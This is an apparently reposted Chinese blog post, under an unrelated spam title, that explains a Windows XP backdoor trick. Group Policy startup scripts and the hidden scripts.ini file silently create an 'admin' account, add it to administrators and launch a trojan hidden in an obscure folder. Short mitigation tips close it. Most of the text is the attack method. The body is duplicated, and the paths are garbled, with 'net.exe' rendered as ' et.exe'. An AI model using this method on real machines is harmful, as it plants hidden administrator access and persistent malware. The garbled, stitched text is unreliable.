成品网站分享一下/上海百度推广客服电话多少
换个角度 开启后门的另一个思路(转)[@more@] 1、组策略启动脚本
利用过程:启动组策略(运行->gpedit.msc->计算机配置->Windows 设置->脚本(启动/关机) )
2、启动与关机相关设置
选择启动->属性->添加,会弹出选择脚本名。选择程序 C:windowssystem32 et.exe,参数 user admin /add 来执行 net user admin /add。再同样添加C:Windowssystem32 et.exe localgroup administrators admin /add来执行 net localgroup administrators admin /add。
费话少说: 再经过进一步了解的时候发现这里是由C:WINDOWSsystem32GroupPolicyMachineScriptsscripts.ini(PS:默认是隐藏的。)来控制 shutdown 和 Startup 的。
ini组成方式如下:
[Startup]
0CmdLine=C:WINDOWSsystem32 et.exe
0Parameters=user admin /add
1CmdLine=C:WINDOWSsystem32 et.exe
1Parameters=localgroup administrators admin /add
[Shutdown]
0CmdLine=1.bat
0Parameters=
[startup] 代表是启动
0CmdLine=C:WINDOWSsystem32 et.exe 脚本名
0Parameters=user admin /add 脚本参数
1CmdLine=C:WINDOWSsystem32 et.exe 第二条脚本名
1Parameters=localgroup administrators admin /add 第二条脚本参数
[Shutdown] 关闭
0CmdLine=1.bat 脚本名 1.bat 目录队应于
C:WINDOWSsystem32GroupPolicyMachineScriptsStartup
0Parameters= 参数
也就是说 scripts.ini 控制着整个启动,就如同以前 win.ini 一样。
C:WINDOWSsystem32GroupPolicyMachineScriptsStartup 启动文件的目录,那样脚本名路径就可以不用加详细目录名了。
C:WINDOWSsystem32GroupPolicyMachineScriptsshutdown 关闭文件目录,同上。
思路就这样,copy 后门到非常隐藏的目录,再加个启动脚本参数,实现木马启动。
解决此缺陷的方法:组策略->计算机配置->管理模板->系统->脚本,相应的禁止就行了。
或者来招毒的,彻底禁止掉这个:把scripts.ini 对应用户权限全部删除,system administrators 全部取消,就没人能访问了。
以上在 Windows XP SP2 均已测试成功。
利用过程:启动组策略(运行->gpedit.msc->计算机配置->Windows 设置->脚本(启动/关机) )
2、启动与关机相关设置
选择启动->属性->添加,会弹出选择脚本名。选择程序 C:windowssystem32 et.exe,参数 user admin /add 来执行 net user admin /add。再同样添加C:Windowssystem32 et.exe localgroup administrators admin /add来执行 net localgroup administrators admin /add。
费话少说: 再经过进一步了解的时候发现这里是由C:WINDOWSsystem32GroupPolicyMachineScriptsscripts.ini(PS:默认是隐藏的。)来控制 shutdown 和 Startup 的。
ini组成方式如下:
[Startup]
0CmdLine=C:WINDOWSsystem32 et.exe
0Parameters=user admin /add
1CmdLine=C:WINDOWSsystem32 et.exe
1Parameters=localgroup administrators admin /add
[Shutdown]
0CmdLine=1.bat
0Parameters=
[startup] 代表是启动
0CmdLine=C:WINDOWSsystem32 et.exe 脚本名
0Parameters=user admin /add 脚本参数
1CmdLine=C:WINDOWSsystem32 et.exe 第二条脚本名
1Parameters=localgroup administrators admin /add 第二条脚本参数
[Shutdown] 关闭
0CmdLine=1.bat 脚本名 1.bat 目录队应于
C:WINDOWSsystem32GroupPolicyMachineScriptsStartup
0Parameters= 参数
也就是说 scripts.ini 控制着整个启动,就如同以前 win.ini 一样。
C:WINDOWSsystem32GroupPolicyMachineScriptsStartup 启动文件的目录,那样脚本名路径就可以不用加详细目录名了。
C:WINDOWSsystem32GroupPolicyMachineScriptsshutdown 关闭文件目录,同上。
思路就这样,copy 后门到非常隐藏的目录,再加个启动脚本参数,实现木马启动。
解决此缺陷的方法:组策略->计算机配置->管理模板->系统->脚本,相应的禁止就行了。
或者来招毒的,彻底禁止掉这个:把scripts.ini 对应用户权限全部删除,system administrators 全部取消,就没人能访问了。
以上在 Windows XP SP2 均已测试成功。
来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10617542/viewspace-962825/,如需转载,请注明出处,否则将追究法律责任。
转载于:http://blog.itpub.net/10617542/viewspace-962825/